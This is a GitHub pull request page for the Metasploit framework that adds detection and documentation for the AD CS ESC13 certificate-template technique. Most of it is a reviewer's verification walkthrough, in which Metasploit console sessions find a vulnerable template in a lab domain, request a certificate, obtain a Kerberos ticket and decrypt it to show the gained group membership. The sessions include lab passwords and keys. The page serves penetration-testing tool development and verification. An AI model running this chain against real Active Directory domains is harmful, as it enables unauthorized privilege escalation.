AD CS Updates for ESC13 #18892
Merged
AD CS Updates for ESC13 #18892
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This way the DN can just be copy-pasted into locations where a DN is expected.
zeroSteiner
force-pushed
the
feat/mod/ldap/adcs-certs2
branch
from
5bb88fe
to
532c020
Compare
smcintyre-r7
added
module
docs
rn-enhancement
jheysel-r7
reviewed
Feb 27, 2024
There was a problem hiding this comment.
Thanks for the addition @zeroSteiner! Verification steps were clear and easy to follow. Also the mermaid diagrams look great. I found one rather inconsequential typo in one of the docs but other than that PR looks good.
Verification Steps
Use the ldap_query module to identify the group RID which will be used later to confirm everything worked successfully.
msf6 auxiliary(gather/ldap_query) > options
Module options (auxiliary/gather/ldap_query):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
DOMAIN COLLALABS1 no The domain to authenticate to
OUTPUT_FORMAT table yes The output format to use (Accepted: csv, table, json)
PASSWORD Password1! no The password to authenticate with
RHOSTS 3.19.108.211 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME aliddle@collalabs1.local no The username to authenticate with
When ACTION is RUN_QUERY_FILE:
Name Current Setting Required Description
---- --------------- -------- -----------
QUERY_FILE_PATH no Path to the JSON or YAML file to load and run queries from
When ACTION is RUN_SINGLE_QUERY:
Name Current Setting Required Description
---- --------------- -------- -----------
QUERY_ATTRIBUTES no Comma separated list of attributes to retrieve from the server
QUERY_FILTER no Filter to send to the target LDAP server to perform the query
Auxiliary action:
Name Description
---- -----------
ENUM_ACCOUNTS Dump info about all known user accounts in the domain.
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 3.19.108.211
[*] Discovering base DN automatically
[+] 3.19.108.211:389 Discovered base DN: DC=collalabs1,DC=local
[+] 3.19.108.211:389 Discovered schema DN: DC=collalabs1,DC=local
<output of 8922 entries redacted>
CN=Alice Liddle,CN=Users,DC=collalabs1,DC=local
===============================================
Name Attributes
---- ----------
badpwdcount 0
displayname Alice Liddle
lastlogoff 1601-01-01 00:00:00 UTC
lastlogon 2024-02-27 21:04:29 UTC
logoncount 2
name Alice Liddle
objectsid S-1-5-21-3474343397-3755413101-2031708755-10051
pwdlastset
samaccountname aliddle
useraccountcontrol 66048
userprincipalname aliddle@collalabs1.local
[*] Query returned 8923 results.
[*] Auxiliary module execution completed
Use the ldap_esc_vulnerable_cert_finder module to find the vulnerable certificate
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > options
Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
DOMAIN COLLALABS1 no The domain to authenticate to
PASSWORD Password1! no The password to authenticate with
REPORT_NONENROLLABLE false yes Report nonenrollable certificate templates
RHOSTS 3.19.108.211 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME aliddle@collalabs1.local no The username to authenticate with
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
[*] Running module against 3.19.108.211
[*] Discovering base DN automatically
[+] 3.19.108.211:389 Discovered base DN: DC=collalabs1,DC=local
[*] Template: SubCA
[*] Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: ESC1-Test
[*] Distinguished Name: CN=ESC1-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC1
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: User
[*] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC3_TEMPLATE_2
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: Administrator
[*] Distinguished Name: CN=Administrator,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC3_TEMPLATE_2
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: Machine
[*] Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC3_TEMPLATE_2
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-515 (Domain Computers)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: DomainController
[*] Distinguished Name: CN=DomainController,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC3_TEMPLATE_2
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-498 (Enterprise Read-only Domain Controllers)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-516 (Domain Controllers)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-9 (Enterprise Domain Controllers)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Template: ESC13-Test
[*] Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
[*] Vulnerable to: ESC13
[*] Notes: ESC13 groups: ESC13-Group
[*] Certificate Template Enrollment SIDs:
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] Issuing CAs:
[*] * collalabs1-SRV-ADDS01-CA
[*] Server: SRV-ADDS01.collalabs1.local
[*] Enrollment SIDs:
[*] * S-1-5-11 (Authenticated Users)
[*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
[*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
[*] Auxiliary module execution completed
Issue the certificate with icpr_cert for the certificate ESC13-Test that was found to be vulnerable to ESC13 by using the previous module.
msf6 auxiliary(admin/dcerpc/icpr_cert) > options
Module options (auxiliary/admin/dcerpc/icpr_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
CA collalabs1-SRV-ADDS01-CA yes The target certificate authority
CERT_TEMPLATE ESC13-Test yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
RHOSTS 3.19.108.211 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain COLLALABS1 no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser aliddle no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
REQUEST_CERT Request a certificate
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 3.19.108.211
[*] 3.19.108.211:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 3.19.108.211:445 - Binding to \cert...
[+] 3.19.108.211:445 - Bound to \cert
[*] 3.19.108.211:445 - Requesting a certificate for user aliddle - digest algorithm: SHA256 - template: ESC13-Test
[+] 3.19.108.211:445 - The requested certificate was issued.
[*] 3.19.108.211:445 - Certificate Email: aliddle@collalabs1.local
[*] 3.19.108.211:445 - Certificate SID: S-1-5-21-3474343397-3755413101-2031708755-10051
[*] 3.19.108.211:445 - Certificate UPN: aliddle@collalabs1.local
[*] 3.19.108.211:445 - Certificate stored at: /Users/jheysel/.msf4/loot/20240227130259_default_3.19.108.211_windows.ad.cs_318482.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >
Use kerberos/get_ticket to obtain a TGT by using the cert obtained in the previous module.
msf6 auxiliary(admin/kerberos/get_ticket) > options
Module options (auxiliary/admin/kerberos/get_ticket):
Name Current Setting Required Description
---- --------------- -------- -----------
AES_KEY 69d0110edb378e28afb6fedcffb5506d6a6427a346594ec2a8d no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
c1b699c6521c3
CERT_FILE /Users/jheysel/.msf4/loot/20240227130259_default_3. no The PKCS12 (.pfx) certificate file to authenticate with
19.108.211_windows.ad.cs_318482.pfx
CERT_PASSWORD no The certificate file's password
DOMAIN COLLALABS1 no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
NTHASH no The NT hash in hex string. Server must support RC4
PASSWORD Password1! no The domain user's password
RHOSTS 3.19.108.211 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploi
t.html
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME aliddle no The domain user
When ACTION is GET_TGS:
Name Current Setting Required Description
---- --------------- -------- -----------
IMPERSONATE no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
Krb5Ccname no The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked
SPN no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local
Auxiliary action:
Name Description
---- -----------
GET_TGT Request a Ticket-Granting-Ticket (TGT)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > run
[*] Running module against 3.19.108.211
[!] Warning: Provided principal and realm (aliddle@COLLALABS1) do not match entries in certificate:
[!] * aliddle@collalabs1.local
[*] 3.19.108.211:88 - Getting TGT for aliddle@COLLALABS1
[+] 3.19.108.211:88 - Received a valid TGT-Response
[*] 3.19.108.211:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20240227130352_default_3.19.108.211_mit.kerberos.cca_179249.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket)
Use kerberos/inspect_ticket to decrypt the PAC and we see that the group RID from step 1 S-1-5-21-3474343397-3755413101-2031708755-10051 is in the ticket.
msf6 auxiliary(admin/kerberos/inspect_ticket) > options
Module options (auxiliary/admin/kerberos/inspect_ticket):
Name Current Setting Required Description
---- --------------- -------- -----------
AES_KEY 69d0110edb378e28afb6fedcffb5506d6a6427a346594ec2a8dc1b699c6521c3 no The krbtgt/service AES key
NTHASH no The krbtgt/service nthash
TICKET_PATH /Users/jheysel/.msf4/loot/20240227130352_default_3.19.108.211_mit.kerberos.cca_179249.bin yes Path to the ticket (ccache/kirbi format) you wish to inspect
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/inspect_ticket) > run
[*] Running module against 3.19.108.211
[*] Credentials cache: File:/Users/jheysel/.msf4/loot/20240227130352_default_3.19.108.211_mit.kerberos.cca_179249.bin
[*] Primary Principal: aliddle@COLLALABS1.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/COLLALABS1.LOCAL@COLLALABS1.LOCAL
Client: aliddle@COLLALABS1.LOCAL
Ticket etype: 18 (AES256)
Key: 21a8bacfb0672d14f42eca9a36d453c5819d92c88194bf57a236e6715cea355e
Subkey: false
Ticket Length: 1390
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 2024-02-27 13:04:29 -0800
Start time: 2024-02-27 13:04:29 -0800
End time: 2024-02-27 23:04:29 -0800
Renew Till: 2024-02-28 13:03:51 -0800
Ticket:
Ticket Version Number: 5
Realm: COLLALABS1.LOCAL
Server Name: krbtgt/COLLALABS1.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Decrypted (with key: 69d0110edb378e28afb6fedcffb5506d6a6427a346594ec2a8dc1b699c6521c3):
Times:
Auth time: 2024-02-27 13:04:29 -0800
Start time: 2024-02-27 13:04:29 -0800
End time: 2024-02-27 23:04:29 -0800
Renew Till: 2024-02-28 13:03:51 -0800
Client Addresses: 0
Transited: tr_type: 0, Contents: ""
Client Name: 'aliddle'
Client Realm: 'COLLALABS1.LOCAL'
Ticket etype: 18 (AES256)
Session Key: 21a8bacfb0672d14f42eca9a36d453c5819d92c88194bf57a236e6715cea355e
Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT)
PAC:
Validation Info:
Logon Time: 2024-02-22 13:34:04 -0800
Logoff Time: Never Expires (inf)
Kick Off Time: Never Expires (inf)
Password Last Set: 2024-02-15 06:55:11 -0800
Password Can Change: 2024-02-16 06:55:11 -0800
Password Must Change: Never Expires (inf)
Logon Count: 1
Bad Password Count: 0
User ID: 10051
Primary Group ID: 513
User Flags: 32
.... .... .... .... ..0. .... .... .... Used Lmv2 Auth And Ntlmv2 Session Key: The USED_LMV2_AUTH_AND_NTLMV2_SESSION_KEY bit is NOT SET
.... .... .... .... ...0 .... .... .... Used Lmv2 Auth And Session Key: The USED_LMV2_AUTH_AND_SESSION_KEY bit is NOT SET
.... .... .... .... .... 0... .... .... Used Ntlmv2 Auth And Session Key: The USED_NTLMV2_AUTH_AND_SESSION_KEY bit is NOT SET
.... .... .... .... .... .0.. .... .... Profile Path Populated: The PROFILE_PATH_POPULATED bit is NOT SET
.... .... .... .... .... ..0. .... .... Resource Group Ids: The RESOURCE_GROUP_IDS bit is NOT SET
.... .... .... .... .... ...0 .... .... Accepts Ntlmv2: The ACCEPTS_NTLMV2 bit is NOT SET
.... .... .... .... .... .... 0... .... Machine Account: The MACHINE_ACCOUNT bit is NOT SET
.... .... .... .... .... .... .0.. .... Sub Authentication: The SUB_AUTHENTICATION bit is NOT SET
.... .... .... .... .... .... ..1. .... Extra Sids: The EXTRA_SIDS bit is SET
.... .... .... .... .... .... .... 0... Lan Manager: The LAN_MANAGER bit is NOT SET
.... .... .... .... .... .... .... ..0. No Encryption: The NO_ENCRYPTION bit is NOT SET
.... .... .... .... .... .... .... ...0 Guest: The GUEST bit is NOT SET
User Session Key: 00000000000000000000000000000000
User Account Control: 528
.... .... ..0. .... .... .... .... .... Use Aes Keys: The USE_AES_KEYS bit is NOT SET
.... .... ...0 .... .... .... .... .... Partial Secrets Account: The PARTIAL_SECRETS_ACCOUNT bit is NOT SET
.... .... .... 0... .... .... .... .... No Auth Data Required: The NO_AUTH_DATA_REQUIRED bit is NOT SET
.... .... .... .0.. .... .... .... .... Trusted To Authenticate For Delegation: The TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION bit is NOT SET
.... .... .... ..0. .... .... .... .... Password Expired: The PASSWORD_EXPIRED bit is NOT SET
.... .... .... ...0 .... .... .... .... Dont Require Preauth: The DONT_REQUIRE_PREAUTH bit is NOT SET
.... .... .... .... 0... .... .... .... Use Des Key Only: The USE_DES_KEY_ONLY bit is NOT SET
.... .... .... .... .0.. .... .... .... Not Delegated: The NOT_DELEGATED bit is NOT SET
.... .... .... .... ..0. .... .... .... Trusted For Delegation: The TRUSTED_FOR_DELEGATION bit is NOT SET
.... .... .... .... ...0 .... .... .... Smartcard Required: The SMARTCARD_REQUIRED bit is NOT SET
.... .... .... .... .... 0... .... .... Encrypted Test Password Allowed: The ENCRYPTED_TEST_PASSWORD_ALLOWED bit is NOT SET
.... .... .... .... .... .0.. .... .... Account Auto Lock: The ACCOUNT_AUTO_LOCK bit is NOT SET
.... .... .... .... .... ..1. .... .... Dont Expire Password: The DONT_EXPIRE_PASSWORD bit is SET
.... .... .... .... .... ...0 .... .... Server Trust Account: The SERVER_TRUST_ACCOUNT bit is NOT SET
.... .... .... .... .... .... 0... .... Workstation Trust Account: The WORKSTATION_TRUST_ACCOUNT bit is NOT SET
.... .... .... .... .... .... .0.. .... Interdomain Trust Account: The INTERDOMAIN_TRUST_ACCOUNT bit is NOT SET
.... .... .... .... .... .... ..0. .... Mns Logon Account: The MNS_LOGON_ACCOUNT bit is NOT SET
.... .... .... .... .... .... ...1 .... Normal Account: The NORMAL_ACCOUNT bit is SET
.... .... .... .... .... .... .... 0... Temp Duplicate Account: The TEMP_DUPLICATE_ACCOUNT bit is NOT SET
.... .... .... .... .... .... .... .0.. Password Not Required: The PASSWORD_NOT_REQUIRED bit is NOT SET
.... .... .... .... .... .... .... ..0. Home Directory Required: The HOME_DIRECTORY_REQUIRED bit is NOT SET
.... .... .... .... .... .... .... ...0 Account Disabled: The ACCOUNT_DISABLED bit is NOT SET
Sub Auth Status: 0
Last Successful Interactive Logon: No Time Set (0)
Last Failed Interactive Logon: No Time Set (0)
Failed Interactive Logon Count: 0
Extra SID Count: 1
SID: S-1-18-1, Attributes: 7
Resource Group Count: 0
Group Count: 2
Group IDs:
Relative ID: 10052
Attributes: 7
..0. .... .... .... .... .... .... .... Resource: The RESOURCE bit is NOT SET
.... .... .... .... .... .... .... 0... Owner: The OWNER bit is NOT SET
.... .... .... .... .... .... .... .1.. Enabled: The ENABLED bit is SET
.... .... .... .... .... .... .... ..1. Enabled By Default: The ENABLED_BY_DEFAULT bit is SET
.... .... .... .... .... .... .... ...1 Mandatory: The MANDATORY bit is SET
Relative ID: 513
Attributes: 7
..0. .... .... .... .... .... .... .... Resource: The RESOURCE bit is NOT SET
.... .... .... .... .... .... .... 0... Owner: The OWNER bit is NOT SET
.... .... .... .... .... .... .... .1.. Enabled: The ENABLED bit is SET
.... .... .... .... .... .... .... ..1. Enabled By Default: The ENABLED_BY_DEFAULT bit is SET
.... .... .... .... .... .... .... ...1 Mandatory: The MANDATORY bit is SET
Logon Domain ID: S-1-5-21-3474343397-3755413101-2031708755
Effective Name: 'aliddle'
Full Name: 'Alice Liddle'
Logon Script: ''
Profile Path: ''
Home Directory: ''
Home Directory Drive: ''
Logon Server: 'SRV-ADDS01'
Logon Domain Name: 'collalabs1'
Credential information:
{:ul_type=>2, :cb_buffer_size=>148, :offset=>624, :buffer=>{:pac_element=>{:ul_type=>2, :version=>0, :encryption_type=>18, :serialized_data=>[169, 41, 33, 219, 18, 145, 168, 95, 210, 161, 219, 201, 61, 57, 156, 223, 124, 22, 24, 1, 94, 253, 145, 117, 232, 89, 235, 121, 27, 124, 248, 173, 143, 35, 99, 247, 4, 63, 32, 164, 210, 18, 253, 101, 40, 151, 40, 111, 42, 111, 191, 124, 170, 164, 214, 244, 36, 201, 27, 239, 139, 198, 68, 77, 30, 98, 75, 84, 79, 198, 179, 253, 38, 164, 19, 194, 220, 39, 166, 43, 202, 30, 176, 225, 169, 133, 186, 246, 52, 251, 22, 181, 164, 129, 219, 133, 123, 193, 241, 188, 115, 114, 21, 51, 218, 105, 228, 138, 200, 2, 42, 248, 130, 110, 128, 16, 51, 161, 255, 149, 31, 128, 157, 5, 189, 223, 226, 241, 156, 208, 38, 85, 91, 58, 71, 100, 246, 180, 201, 180]}, :padding=>"\x00\x00\x00\x00"}}
Pac Server Checksum:
Signature: 81ee5fc17b37bf0b714d4f96
Pac Privilege Server Checksum:
Signature: 8039c69af57244f1bf43d21d
Client Info:
Name: 'aliddle'
Client ID: 2024-02-27 13:04:29 -0800
UPN and DNS Information:
UPN: aliddle@collalabs1.local
DNS Domain Name: COLLALABS1.LOCAL
Flags: 2
.... .... .... .... .... .... .... ..1. Sam Name And Sid: The SAM_NAME_AND_SID bit is SET
.... .... .... .... .... .... .... ...0 Upn Name Constructed: The UPN_NAME_CONSTRUCTED bit is NOT SET
SAM Name: aliddle
SID: S-1-5-21-3474343397-3755413101-2031708755-10051
Pac Attributes:
Flag length: 2
Flags: 1
.... .... .... .... .... .... .... ..0. Pac Was Requested: The PAC_WAS_REQUESTED bit is NOT SET
.... .... .... .... .... .... .... ...1 Pac Was Given Implicitly: The PAC_WAS_GIVEN_IMPLICITLY bit is SET
Pac Requestor:
SID: S-1-5-21-3474343397-3755413101-2031708755-10051
[*] Auxiliary module execution completed
docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
Outdated
Show resolved
Hide resolved
zeroSteiner
force-pushed
the
feat/mod/ldap/adcs-certs2
branch
from
532c020
to
1726767
Compare
Release NotesThis makes some changes necessary for users to leverage the latest ADCS ESC13 technique. These are related to the identification of misconfigured certificate templates and workflow documentation. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This makes some changes necessary for users to leverage the latest ESC technique, ESC13. Actually exploiting ESC13 did not require any code changes to the icpr_cert module so the changes contained within this PR are related to the identification of misconfigured certificate templates and workflow documentation.
The
ldap_esc_vulnerable_cert_findermodule was also updated to establish an authenticated LDAP connection exactly once.The
ldap_querymodule was also updated with the new changes to Rex::Text that allow tables to more clearly print nested rows (see #18849). Also the DN is now printed with the commas, which means the value can just be copied and pasted into a location where a DN is expected. DNs are supposed to have commas AFAIK so I'm not sure why they were removed at first.Verification
For steps, you can basically follow along with the blog starting at the "ESC13 Demo" section.
ldap_esc_vulnerable_cert_findermodule to find the vulnerable certificateicpr_certkerberos/get_ticketto obtain a TGTkerberos/inspect_ticketto decrypt the PAC and see the group RID from step 1 in the ticket